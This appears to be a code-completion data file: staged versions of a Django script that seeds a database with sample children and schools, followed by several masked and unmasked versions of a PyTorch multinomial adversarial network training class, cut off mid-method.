"step-3": "<mask token>\n\n\nclass ChildImport(object):\n\n def __init__(self, scriptName=None):\n x = Child.objects.create(first_name='Timmy', last_name='Thompson',\n school=School.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=2))\n x.save()\n x = Child.objects.create(first_name='Jimmy', last_name='Johnson',\n school=School.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=1))\n x.save()\n x = Child.objects.create(first_name='Bart', last_name='Simpson',\n school=School.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=4))\n x.save()\n x = Child.objects.create(first_name='Lisa', last_name='Simpson',\n school=School.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=3))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name='Becker',\n school=School.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=6))\n x.save()\n x = Child.objects.create(first_name='Jasmine', last_name='Goulette',\n school=School.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=5))\n x.save()\n x = Child.objects.create(first_name='Kristina', last_name='Murry',\n school=School.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=8))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name=\n 'Scheonster', school=School.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=7))\n x.save()\n",
"step-4": "<mask token>\nfrom Data_Base.models import School, Person, Child\n<mask token>\n\n\nclass ChildImport(object):\n\n def __init__(self, scriptName=None):\n x = Child.objects.create(first_name='Timmy', last_name='Thompson',\n school=School.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=2))\n x.save()\n x = Child.objects.create(first_name='Jimmy', last_name='Johnson',\n school=School.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=1))\n x.save()\n x = Child.objects.create(first_name='Bart', last_name='Simpson',\n school=School.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=4))\n x.save()\n x = Child.objects.create(first_name='Lisa', last_name='Simpson',\n school=School.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=3))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name='Becker',\n school=School.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=6))\n x.save()\n x = Child.objects.create(first_name='Jasmine', last_name='Goulette',\n school=School.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=5))\n x.save()\n x = Child.objects.create(first_name='Kristina', last_name='Murry',\n school=School.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=8))\n x.save()\n x = Child.objects.create(first_name='Andrew', last_name=\n 'Scheonster', school=School.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=7))\n x.save()\n",
"step-5": "\"\"\" Python Package Support \"\"\"\n# Not applicable\n\n\"\"\" Django Package Support \"\"\"\n# Not applicable\n\n\"\"\" Internal Package Support \"\"\"\nfrom Data_Base.models import School, Person, Child\n\n\"\"\"\n Data_Base/Data/Imports/child_import.py\n \n Author: Matthew J Swann; \n Yong Kin; \n Bradon Atkins; and \n Adam Carter\n \n Version: 1.0\n Last Update: 2013-04-07\n Update By: Matthew J Swann\n \n Importing data to the person table.\n\n \"\"\"\n \nclass ChildImport(object):\n \n def __init__(self, scriptName=None):\n \n # 1\n x = Child.objects.create(\n first_name = 'Timmy',\n last_name = 'Thompson',\n school = School.objects.get(pk=1), \n )\n x.family.add(Person.objects.get(pk=1))\n x.family.add(Person.objects.get(pk=2))\n x.save()\n\n # 2\n x = Child.objects.create(\n first_name = 'Jimmy',\n last_name = 'Johnson',\n school = School.objects.get(pk=2), \n )\n x.family.add(Person.objects.get(pk=2))\n x.family.add(Person.objects.get(pk=1))\n x.save()\n \n # 3\n x = Child.objects.create(\n first_name = 'Bart',\n last_name = 'Simpson',\n school = School.objects.get(pk=3), \n )\n x.family.add(Person.objects.get(pk=3))\n x.family.add(Person.objects.get(pk=4))\n x.save()\n \n # 4\n x = Child.objects.create(\n first_name = 'Lisa',\n last_name = 'Simpson',\n school = School.objects.get(pk=4), \n )\n x.family.add(Person.objects.get(pk=4))\n x.family.add(Person.objects.get(pk=3))\n x.save()\n \n # 5\n x = Child.objects.create(\n first_name = 'Andrew',\n last_name = 'Becker',\n school = School.objects.get(pk=5), \n )\n x.family.add(Person.objects.get(pk=5))\n x.family.add(Person.objects.get(pk=6))\n x.save()\n \n # 6\n x = Child.objects.create(\n first_name = 'Jasmine',\n last_name = 'Goulette',\n school = School.objects.get(pk=6), \n )\n x.family.add(Person.objects.get(pk=6))\n x.family.add(Person.objects.get(pk=5))\n x.save()\n \n # 7\n x = Child.objects.create(\n first_name = 'Kristina',\n last_name = 'Murry',\n school = School.objects.get(pk=7), 
\n )\n x.family.add(Person.objects.get(pk=7))\n x.family.add(Person.objects.get(pk=8))\n x.save()\n\n # 8\n x = Child.objects.create(\n first_name = 'Andrew',\n last_name = 'Scheonster',\n school = School.objects.get(pk=8), \n )\n x.family.add(Person.objects.get(pk=8))\n x.family.add(Person.objects.get(pk=7))\n x.save()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MultinomialAdversarialNetwork(TopicModel):
<|reserved_special_token_0|>
def prepare_data(self, d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
train = data_utils.TensorDataset(features, target)
train_loaders[domain] = DataLoader(train, opt.batch_size,
shuffle=True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
uset = data_utils.TensorDataset(features, target)
unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
shuffle=True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self
.prepare_data(d))
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.
F_hidden_sizes, opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],
opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +
opt.domain_hidden_size, opt.shared_hidden_size + opt.
domain_hidden_size, 2, opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt
.shared_hidden_size, len(opt.all_domains), opt.loss, opt.
dropout, opt.D_bn)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.
device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.
parameters() if self.F_s else [], self.C.parameters()] + [f.
parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
correct, total = defaultdict(int), defaultdict(int)
d_correct, d_total = 0, 0
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred == tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred == d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss,
len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs['display_step'] == 0:
print('Epoch:', '%04d, done' % (epoch + 1))
return loss_d_res, l_d_res, l_c_res
<|reserved_special_token_0|>
def get_name(self):
if self._name is None:
self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
return self._name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultinomialAdversarialNetwork(TopicModel):
def __init__(self, k, m, model_params=None, log_params=None):
super().__init__(k, m, model_params, log_params)
def prepare_data(self, d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
train = data_utils.TensorDataset(features, target)
train_loaders[domain] = DataLoader(train, opt.batch_size,
shuffle=True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
uset = data_utils.TensorDataset(features, target)
unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
shuffle=True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self
.prepare_data(d))
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.
F_hidden_sizes, opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],
opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +
opt.domain_hidden_size, opt.shared_hidden_size + opt.
domain_hidden_size, 2, opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt
.shared_hidden_size, len(opt.all_domains), opt.loss, opt.
dropout, opt.D_bn)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.
device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.
parameters() if self.F_s else [], self.C.parameters()] + [f.
parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
correct, total = defaultdict(int), defaultdict(int)
d_correct, d_total = 0, 0
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred == tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred == d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss,
len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs['display_step'] == 0:
print('Epoch:', '%04d, done' % (epoch + 1))
return loss_d_res, l_d_res, l_c_res
<|reserved_special_token_0|>
def get_name(self):
if self._name is None:
self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
return self._name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultinomialAdversarialNetwork(TopicModel):
def __init__(self, k, m, model_params=None, log_params=None):
super().__init__(k, m, model_params, log_params)
def prepare_data(self, d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
train = data_utils.TensorDataset(features, target)
train_loaders[domain] = DataLoader(train, opt.batch_size,
shuffle=True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
uset = data_utils.TensorDataset(features, target)
unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
shuffle=True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self
.prepare_data(d))
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.
F_hidden_sizes, opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],
opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +
opt.domain_hidden_size, opt.shared_hidden_size + opt.
domain_hidden_size, 2, opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt
.shared_hidden_size, len(opt.all_domains), opt.loss, opt.
dropout, opt.D_bn)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.
device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.
parameters() if self.F_s else [], self.C.parameters()] + [f.
parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
correct, total = defaultdict(int), defaultdict(int)
d_correct, d_total = 0, 0
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred == tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred == d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss,
len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs['display_step'] == 0:
print('Epoch:', '%04d, done' % (epoch + 1))
return loss_d_res, l_d_res, l_c_res
def transform(self, d, *args, **kwargs):
F_d = self.F_d[opt.domains[0]]
self.F_s.eval()
F_d.eval()
self.C.eval()
_, _, _, it = self.prepare_data(d)
it = it[opt.unlabeled_domains[0]]
correct = 0
total = 0
confusion = ConfusionMeter(opt.num_labels)
preds = []
for inputs, targets in it:
inputs = inputs.to(opt.device)
targets = targets.to(opt.device)
d_features = F_d(inputs)
features = torch.cat((self.F_s(inputs), d_features), dim=1)
outputs = self.C(features)
_, pred = torch.max(outputs, 1)
confusion.add(pred.data, targets.data)
total += targets.size(0)
correct += (pred == targets).sum().item()
acc = correct / total
return acc, correct
def get_name(self):
if self._name is None:
self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
return self._name
<|reserved_special_token_1|>
import numpy as np
from ..utils import Dataset
import math
import random
from .interface import TopicModel
from .man_model.models import *
from .man_model import utils
from .man_model.options import opt
import torch.utils.data as data_utils
from tqdm import tqdm
from collections import defaultdict
import itertools
from torchnet.meter import ConfusionMeter
import torch
import torch.nn as nn
import torch.nn.functional as functional
import torch.optim as optim
from torch.utils.data import ConcatDataset, DataLoader
<|reserved_special_token_0|>
def softmax(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x, axis=1).reshape(-1, 1))
return e_x / np.sum(e_x, axis=1).reshape(-1, 1)
class MultinomialAdversarialNetwork(TopicModel):
    """Multinomial Adversarial Network (MAN) for cross-domain classification.

    Jointly trains a shared feature extractor ``F_s``, one private extractor
    ``F_d`` per labeled domain, a sentiment classifier ``C`` and a domain
    discriminator ``D`` in an adversarial loop.  Hyper-parameters are read
    from the module-level ``opt`` object; labeled domains come from
    ``opt.domains`` and unlabeled ones from ``opt.unlabeled_domains``.
    """

    def __init__(self, k, m, model_params=None, log_params=None):
        super().__init__(k, m, model_params, log_params)

    def prepare_data(self, d):
        """Build per-domain ``DataLoader``s and fresh iterators over them.

        Args:
            d: dict mapping domain name -> dataset with a sparse feature
               matrix ``X`` and a label vector ``y``.  Labeled domains are
               treated as the train set, unlabeled domains as the test set.

        Returns:
            Tuple ``(train_loaders, train_iters, unlabeled_loaders,
            unlabeled_iters)``, each a dict keyed by domain name.
        """
        train_loaders, train_iters = {}, {}
        unlabeled_loaders, unlabeled_iters = {}, {}
        for domain in opt.domains:
            # The extractors require float32 inputs, hence the explicit cast.
            features = torch.from_numpy(d[domain].X.todense().astype('float32'))
            target = torch.from_numpy(d[domain].y)
            train = data_utils.TensorDataset(features, target)
            train_loaders[domain] = DataLoader(train, opt.batch_size,
                                               shuffle=True)
            train_iters[domain] = iter(train_loaders[domain])
        for domain in opt.unlabeled_domains:
            features = torch.from_numpy(d[domain].X.todense().astype('float32'))
            target = torch.from_numpy(d[domain].y)
            uset = data_utils.TensorDataset(features, target)
            unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
                                                   shuffle=True)
            unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
        return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters

    def fit(self, d, *args, **kwargs):
        """Run the adversarial training loop.

        Args:
            d: domain -> dataset dict (see :meth:`prepare_data`); must
               contain a ``'train'`` entry whose ``X`` fixes the input width.
            kwargs: must contain ``'display_step'`` (epoch print interval).

        Returns:
            Three per-epoch lists: discriminator loss on the first unlabeled
            domain, the epoch's last adversarial loss ``l_d`` and the epoch's
            last classification loss ``l_c``.
        """
        train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (
            self.prepare_data(d))
        # Build the networks.  C consumes the concatenation of shared and
        # private features; its output size must be 2 even for binary labels.
        input_dim = d['train'].X.shape[1]
        self.F_s = MlpFeatureExtractor(input_dim, opt.F_hidden_sizes,
                                       opt.shared_hidden_size, opt.dropout)
        self.F_d = {}
        for domain in opt.domains:
            self.F_d[domain] = MlpFeatureExtractor(
                input_dim, opt.F_hidden_sizes, opt.domain_hidden_size,
                opt.dropout)
        self.C = SentimentClassifier(
            opt.C_layers, opt.shared_hidden_size + opt.domain_hidden_size,
            opt.shared_hidden_size + opt.domain_hidden_size, 2,
            opt.dropout, opt.C_bn)
        self.D = DomainClassifier(
            opt.D_layers, opt.shared_hidden_size, opt.shared_hidden_size,
            len(opt.all_domains), opt.loss, opt.dropout, opt.D_bn)
        self.F_s, self.C, self.D = (self.F_s.to(opt.device),
                                    self.C.to(opt.device),
                                    self.D.to(opt.device))
        for f_d in self.F_d.values():
            f_d.to(opt.device)  # nn.Module.to moves parameters in place
        optimizer = optim.Adam(itertools.chain(*map(list,
            [self.F_s.parameters() if self.F_s else [], self.C.parameters()]
            + [f.parameters() for f in self.F_d.values()])), lr=0.0001)
        optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
        loss_d_res = []
        l_d_res = []
        l_c_res = []
        for epoch in range(opt.max_epoch):
            self.F_s.train()
            self.C.train()
            self.D.train()
            for f in self.F_d.values():
                f.train()
            # Per-domain training accuracy and discriminator accuracy.
            correct, total = defaultdict(int), defaultdict(int)
            d_correct, d_total = 0, 0
            # Conceptually, one epoch = one pass over the first labeled domain.
            num_iter = len(train_loaders[opt.domains[0]])
            for _i in range(num_iter):
                # ---- D step: update the discriminator only. ----
                # BUG FIX: the original `map(utils.freeze_net, self.F_d.values())`
                # was never consumed -- map() is lazy in Python 3 -- so the
                # private extractors were never frozen.  Use explicit loops.
                utils.freeze_net(self.F_s)
                for f_d in self.F_d.values():
                    utils.freeze_net(f_d)
                utils.freeze_net(self.C)
                utils.unfreeze_net(self.D)
                for _ in range(opt.n_critic):  # optional WGAN n_critic trick
                    self.D.zero_grad()
                    loss_d = {}
                    for domain in opt.unlabeled_domains:
                        d_inputs, _ = utils.endless_get_next_batch(
                            unlabeled_loaders, unlabeled_iters, domain)
                        d_inputs = d_inputs.to(opt.device)
                        d_targets = utils.get_domain_label(opt.loss, domain,
                                                           len(d_inputs))
                        d_outputs = self.D(self.F_s(d_inputs))
                        _, pred = torch.max(d_outputs, 1)
                        d_total += len(d_inputs)
                        if opt.loss.lower() == 'l2':
                            # L2 targets are per-domain rows; recover indices.
                            _, tgt_indices = torch.max(d_targets, 1)
                            d_correct += (pred == tgt_indices).sum().item()
                            l_d = functional.mse_loss(d_outputs, d_targets)
                        else:
                            d_correct += (pred == d_targets).sum().item()
                            l_d = functional.nll_loss(d_outputs, d_targets)
                        l_d.backward()
                        loss_d[domain] = l_d.item()
                    optimizerD.step()
                # ---- F & C step: update extractors and classifier. ----
                utils.unfreeze_net(self.F_s)
                for f_d in self.F_d.values():
                    utils.unfreeze_net(f_d)  # same lazy-map fix as above
                utils.unfreeze_net(self.C)
                utils.freeze_net(self.D)
                self.F_s.zero_grad()
                for f_d in self.F_d.values():
                    f_d.zero_grad()
                self.C.zero_grad()
                for domain in opt.domains:
                    inputs, targets = utils.endless_get_next_batch(
                        train_loaders, train_iters, domain)
                    targets = targets.to(opt.device)
                    inputs = inputs.to(opt.device)
                    shared_feat = self.F_s(inputs)
                    domain_feat = self.F_d[domain](inputs)
                    features = torch.cat((shared_feat, domain_feat), dim=1)
                    c_outputs = self.C(features)
                    l_c = functional.nll_loss(c_outputs, targets)
                    # retain_graph: F_s's graph is reused by the adversarial
                    # pass below within the same optimizer step.
                    l_c.backward(retain_graph=True)
                    _, pred = torch.max(c_outputs, 1)
                    total[domain] += targets.size(0)
                    correct[domain] += (pred == targets).sum().item()
                # Push F_s away from D (gradient reversal or L2-to-uniform).
                for domain in opt.unlabeled_domains:
                    d_inputs, _ = utils.endless_get_next_batch(
                        unlabeled_loaders, unlabeled_iters, domain)
                    d_inputs = d_inputs.to(opt.device)
                    d_outputs = self.D(self.F_s(d_inputs))
                    if opt.loss.lower() == 'gr':
                        d_targets = utils.get_domain_label(opt.loss, domain,
                                                           len(d_inputs))
                        l_d = functional.nll_loss(d_outputs, d_targets)
                        if opt.lambd > 0:
                            l_d *= -opt.lambd
                    elif opt.loss.lower() == 'l2':
                        d_targets = utils.get_random_domain_label(
                            opt.loss, len(d_inputs))
                        l_d = functional.mse_loss(d_outputs, d_targets)
                        if opt.lambd > 0:
                            l_d *= opt.lambd
                    # NOTE(review): if opt.loss is neither 'gr' nor 'l2' this
                    # backpropagates a stale l_d from the D step -- confirm
                    # only those two loss modes are ever configured.
                    l_d.backward()
                optimizer.step()
            # Record this epoch's last-iteration losses.  Generalized from
            # the hard-coded loss_d['test'] to the first unlabeled domain.
            loss_d_res.append(loss_d[opt.unlabeled_domains[0]])
            l_d_res.append(l_d.item())
            l_c_res.append(l_c.item())
